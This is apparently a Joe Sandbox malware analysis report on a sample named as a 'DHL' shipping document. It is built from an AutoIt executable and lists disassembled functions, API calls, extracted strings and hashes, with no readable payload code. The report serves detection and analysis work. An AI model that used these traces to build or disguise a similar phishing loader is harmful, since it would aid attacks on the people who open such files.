DispatchMessageW.USER32(?), ref: 00916098
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 009160AC

Strings

@COM_EVENTOBJ, xrefs: 0091591A
@TRAY_ID, xrefs: 00915BB9
@GUI_CTRLID, xrefs: 00915364
@GUI_WINHANDLE, xrefs: 009153B9
@GUI_CTRLHANDLE, xrefs: 0091540E

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 4003667617-3242690629
Opcode ID: fe272181d968df1965b93786d0dc6b11485d2a76ef951b72a38aaf5d338cd2f7
Instruction ID: 29e733249e600054044a207c1a414cad46a33de9c6803bcb814bbca434b18dab
Opcode Fuzzy Hash: fe272181d968df1965b93786d0dc6b11485d2a76ef951b72a38aaf5d338cd2f7
Instruction Fuzzy Hash: 21B2B170608745DFD724DF28C884BAAB7E5FF85304F154A1EE49AC72A1DB75E884CB82

Function 009393DF Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 009391E9: __time64.LIBCMT ref: 009391F3

Part of subcall function 008D5045: _fseek.LIBCMT ref: 008D505D

__wsplitpath.LIBCMT ref: 009394BE

Part of subcall function 008F432E: __wsplitpath_helper.LIBCMT ref: 008F436E

_wcscpy.LIBCMT ref: 009394D1
_wcscat.LIBCMT ref: 009394E4
__wsplitpath.LIBCMT ref: 00939509
_wcscat.LIBCMT ref: 0093951F
_wcscat.LIBCMT ref: 00939532

Part of subcall function 0093922F: _memmove.LIBCMT ref: 00939268
Part of subcall function 0093922F: _memmove.LIBCMT ref: 00939277

_wcscmp.LIBCMT ref: 00939479

Part of subcall function 009399BE: _wcscmp.LIBCMT ref: 00939AAE
Part of subcall function 009399BE: _wcscmp.LIBCMT ref: 00939AC1

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 009396DC
_wcsncpy.LIBCMT ref: 0093974F
DeleteFileW.KERNEL32(?,?), ref: 00939785
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0093979B
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009397AC
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009397BE

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 02a5cad2649e13b72ea45759827c9a1dc8e77795f2e7ea6e229d6fcdd9411069
Instruction ID: 058a768ebc6bc619afb8df5ade86c353bda3256a94d06dac64a955c30262844e
Opcode Fuzzy Hash: 02a5cad2649e13b72ea45759827c9a1dc8e77795f2e7ea6e229d6fcdd9411069
Instruction Fuzzy Hash: D1C11AB1D00219AADF21DFA5CC85AEEB7BDEF55310F0040AAF609E6251DB709A848F65

Function 008D3015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 008D3074
RegisterClassExW.USER32(00000030), ref: 008D309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008D30AF
InitCommonControlsEx.COMCTL32(?), ref: 008D30CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008D30DC
LoadIconW.USER32(000000A9), ref: 008D30F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008D3101

Strings

AutoIt v3 GUI, xrefs: 008D3090
0, xrefs: 008D3056
+, xrefs: 008D305D
TaskbarCreated, xrefs: 008D30A4

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 508ac4f71db86272ba8dca15723ca6c39734e9a936b19b7433d1c15805407092
Instruction ID: e4e35d238ed7d7793bbdd2c0111e3fdb0553e706ee85df8de6d0ddba84996522
Opcode Fuzzy Hash: 508ac4f71db86272ba8dca15723ca6c39734e9a936b19b7433d1c15805407092
Instruction Fuzzy Hash: D43167B1869309AFDB00CFA9D888ADDBBF4FB09321F14456AE580E62A0D3B50545DF40

Function 008D3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 008D3074
RegisterClassExW.USER32(00000030), ref: 008D309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008D30AF
InitCommonControlsEx.COMCTL32(?), ref: 008D30CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008D30DC
LoadIconW.USER32(000000A9), ref: 008D30F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008D3101

Strings

AutoIt v3 GUI, xrefs: 008D3090
0, xrefs: 008D3056
+, xrefs: 008D305D
TaskbarCreated, xrefs: 008D30A4

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: f7f94f568e6d296d4fd337928181ca79f69deb6e59801e9cbe7e6b75b39f2046
Instruction ID: baf5eb6fdea8638da360f0fa2c24518b506972c58e12d7920b1b5cf095d88bee
Opcode Fuzzy Hash: f7f94f568e6d296d4fd337928181ca79f69deb6e59801e9cbe7e6b75b39f2046
Instruction Fuzzy Hash: D921C5B1925318AFDB00DFAAE859BDDBBF4FB08721F04412AF910A62A0D7B14544AF91

Function 008D71EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008D4864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,009962F8,?,008D37C0,?), ref: 008D4882

Part of subcall function 008F074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,008D72C5), ref: 008F0771

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 008D7308
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0090ECF1
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0090ED32
RegCloseKey.ADVAPI32(?), ref: 0090ED70
_wcscat.LIBCMT ref: 0090EDC9

Strings

Include, xrefs: 0090ECE8, 0090ED29
\Include\, xrefs: 008D72C5
\, xrefs: 0090EDEC
Software\AutoIt v3\AutoIt, xrefs: 008D72FE

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 594809e857a05a38e6555e3b882263727bebffb3afd203efe246301713f5fc36
Instruction ID: bc26aac23ecf35724aeb333ef483531cb74305ef8f91e4c5642918f7f87d86bd
Opcode Fuzzy Hash: 594809e857a05a38e6555e3b882263727bebffb3afd203efe246301713f5fc36
Instruction Fuzzy Hash: DE71397142C3059EC714EFA9D8819AFBBE8FF94750B44492FF455C32A1EB309948DB52

Function 008D3A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 008D3A62
LoadCursorW.USER32(00000000,00007F00), ref: 008D3A71
LoadIconW.USER32(00000063), ref: 008D3A88
LoadIconW.USER32(000000A4), ref: 008D3A9A
LoadIconW.USER32(000000A2), ref: 008D3AAC
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 008D3AD2
RegisterClassExW.USER32(?), ref: 008D3B28

Part of subcall function 008D3041: GetSysColorBrush.USER32(0000000F), ref: 008D3074
Part of subcall function 008D3041: RegisterClassExW.USER32(00000030), ref: 008D309E
Part of subcall function 008D3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008D30AF
Part of subcall function 008D3041: InitCommonControlsEx.COMCTL32(?), ref: 008D30CC
Part of subcall function 008D3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008D30DC
Part of subcall function 008D3041: LoadIconW.USER32(000000A9), ref: 008D30F2
Part of subcall function 008D3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008D3101

Strings

0, xrefs: 008D3B06
AutoIt v3, xrefs: 008D3B17
#, xrefs: 008D3B0D

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 5fddb846da06304ac978c4f54cf8f966eb8cac824c3215870b0e603e1caf5199
Instruction ID: 49fe1214780a85d9ca720035c74a11f90dd6839301e1624feb81dbc555853a04
Opcode Fuzzy Hash: 5fddb846da06304ac978c4f54cf8f966eb8cac824c3215870b0e603e1caf5199
Instruction Fuzzy Hash: 0C214B70929308AFEB109FA9EC09B9D7BB4FB08711F00016BE514E62A0D7BA5654AF85

Function 008D3778 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/AutoIt3ExecuteLine, xrefs: 008D38B9
/ErrorStdOut, xrefs: 008D388F
/AutoIt3OutputDebug, xrefs: 008D38A4
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 008D37C0
/AutoIt3ExecuteScript, xrefs: 008D38CE
CMDLINERAW, xrefs: 008D380D
, xrefs: 0090D44E
CMDLINE, xrefs: 008D3834

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$
API String ID: 1825951767-2885450264
Opcode ID: 90ed7e5f5a5a8ce0e0a2f4e561d2905702bfd79fa63582ad8d45aed59937c223
Instruction ID: 3b7829bd75ef56b38949dc4d11d1e1eccf0ddaad1280c3d184659de63c00107f
Opcode Fuzzy Hash: 90ed7e5f5a5a8ce0e0a2f4e561d2905702bfd79fa63582ad8d45aed59937c223
Instruction Fuzzy Hash: 69A13E7181022D9ACB14EBA9CC95AEEB778FF14304F44062BF412F7291EF745A09CB62

Function 008D3633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 008D36D2
KillTimer.USER32(?,00000001), ref: 008D36FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008D371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008D372A
CreatePopupMenu.USER32 ref: 008D373E
PostQuitMessage.USER32(00000000), ref: 008D375F

Strings

TaskbarCreated, xrefs: 008D3725

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 14f748a20bf134979fc70a377891bb7602e6c940c563fcfb90007392d6a478e7
Instruction ID: aa9b73438e1f7ef0e7793f1a750888fc81604db408cab3af49360a98abae74ad
Opcode Fuzzy Hash: 14f748a20bf134979fc70a377891bb7602e6c940c563fcfb90007392d6a478e7
Instruction Fuzzy Hash: C941D6B2128609ABDF246B6CEC09B793759FB15351F14033BF502D63E1DB609A50B763

Function 00E4F5D8 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00E4F6A9
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E4F8CF

Memory Dump Source

Source File: 00000000.00000002.2065276175.0000000000E4C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E4C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e4c000_DHL 806-232024.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
Instruction ID: 0e83981727e349282319b9df5e8f31a969973358bac5d74b681bcb94323bcf36
Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
Instruction Fuzzy Hash: E1A11874E00209EBDB18CFA4D898BEEB7B5FF48705F209169E501BB280D7799A41CF64

Function 008D39E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008D3A15
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 008D3A36
ShowWindow.USER32(00000000,?,?), ref: 008D3A4A
ShowWindow.USER32(00000000,?,?), ref: 008D3A53

Strings

AutoIt v3, xrefs: 008D3A0D, 008D3A12, 008D3A13
edit, xrefs: 008D3A30

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 6f1880598302b1f66b812f5d1ddf0d23d1fb61c2fc7832c7fed0353d93ad7154
Instruction ID: aeccae158ba1cbf6db4f402208213c1f38d717e6daf6f521afa81d08784e6d21
Opcode Fuzzy Hash: 6f1880598302b1f66b812f5d1ddf0d23d1fb61c2fc7832c7fed0353d93ad7154
Instruction Fuzzy Hash: 02F03A706252907EEA30572B6C18E2B2E7DD7CAF61F00002AB910E21B0C2A51800EAB0

Function 00E4F388 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 154
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E4F278: Sleep.KERNELBASE(000001F4), ref: 00E4F289

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00E4F4D0

Strings

8SZ66DIWHAOLM1MYGRL5MY8R8NKH, xrefs: 00E4F533, 00E4F536

Memory Dump Source

Source File: 00000000.00000002.2065276175.0000000000E4C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E4C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e4c000_DHL 806-232024.jbxd

Similarity

API ID: CreateFileSleep
String ID: 8SZ66DIWHAOLM1MYGRL5MY8R8NKH
API String ID: 2694422964-1455615674
Opcode ID: b024d4125774b6a18ffc02b70744cec1601b90cd84d567f02c0db5d83a010cf1
Instruction ID: 202e4d08c775569a8ab154a02dfb008cef7fa95e778953a298769ab7967e5900
Opcode Fuzzy Hash: b024d4125774b6a18ffc02b70744cec1601b90cd84d567f02c0db5d83a010cf1
Instruction Fuzzy Hash: B3618070D04288DAEF11DBB4D848BEEBBB9AF19704F044199E2487B2C1D7B90B49CB65

Function 008D410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0090D5EC

Part of subcall function 008D7D2C: _memmove.LIBCMT ref: 008D7D66

_memset.LIBCMT ref: 008D418D
_wcscpy.LIBCMT ref: 008D41E1
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008D41F1

Strings

Line: , xrefs: 0090D615

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: 12a76adb4c4cdf67ffd51f16cbef5647ae685766c75a83cc67a98ce239b934f2
Instruction ID: 75c497f6d32490c43be2084ba4cc09d18fd0b2959cd8ccdf764025c738ee6faf
Opcode Fuzzy Hash: 12a76adb4c4cdf67ffd51f16cbef5647ae685766c75a83cc67a98ce239b934f2
Instruction Fuzzy Hash: 2A316B71018318ABEB21EB68DC46FEA77E8FB44314F10461BB595D22A1EB74A648C793

Function 008D69CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008D4F3D: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,009962F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 008D4F6F

_free.LIBCMT ref: 0090E68C
_free.LIBCMT ref: 0090E6D3

Part of subcall function 008D6BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 008D6D0D

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 0090E462
Bad directive syntax error, xrefs: 0090E6BB

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: 7a86a1cf5e1f093ff848ad3c7381ceea1ab333982bbf0ff7498337b5e0057a68
Instruction ID: 3acb943514eb9184b3e96c80ff158d0853392e97681444aa363808422f0be775
Opcode Fuzzy Hash: 7a86a1cf5e1f093ff848ad3c7381ceea1ab333982bbf0ff7498337b5e0057a68
Instruction Fuzzy Hash: 46917A71910219AFCF14EFA8C8919EDB7B8FF19314F04496AF815EB2A1EB31A904CB51

Function 008DF8CF Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 168comCOMMON

Download Yara Rule

APIs

Part of subcall function 008F03A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 008F03D3
Part of subcall function 008F03A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 008F03DB
Part of subcall function 008F03A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 008F03E6
Part of subcall function 008F03A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 008F03F1
Part of subcall function 008F03A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 008F03F9
Part of subcall function 008F03A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 008F0401

Part of subcall function 008E6259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,008DFA90), ref: 008E62B4

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 008DFB2D
OleInitialize.OLE32(00000000), ref: 008DFBAA
CloseHandle.KERNEL32(00000000), ref: 009149F2

Strings

, xrefs: 008DFA74

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-2740779761
Opcode ID: ab0852d4f05d4c9c25356c8ba59c1bf6431f9ce9a1c6b39a42e9993bd2e8ee59
Instruction ID: b27805b3a3d05d580d854c017278e4c12ab752c5308c7056fda188e9e4bb8564
Opcode Fuzzy Hash: ab0852d4f05d4c9c25356c8ba59c1bf6431f9ce9a1c6b39a42e9993bd2e8ee59
Instruction Fuzzy Hash: 9F81A8B09293408FC794EFBEE9516257BE8FB99748710862BE019C7372EB315444EF52

Function 008D35B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,008D35A1,SwapMouseButtons,00000004,?), ref: 008D35D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,008D35A1,SwapMouseButtons,00000004,?,?,?,?,008D2754), ref: 008D35F5
RegCloseKey.KERNELBASE(00000000,?,?,008D35A1,SwapMouseButtons,00000004,?,?,?,?,008D2754), ref: 008D3617

Strings

Control Panel\Mouse, xrefs: 008D35D2

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

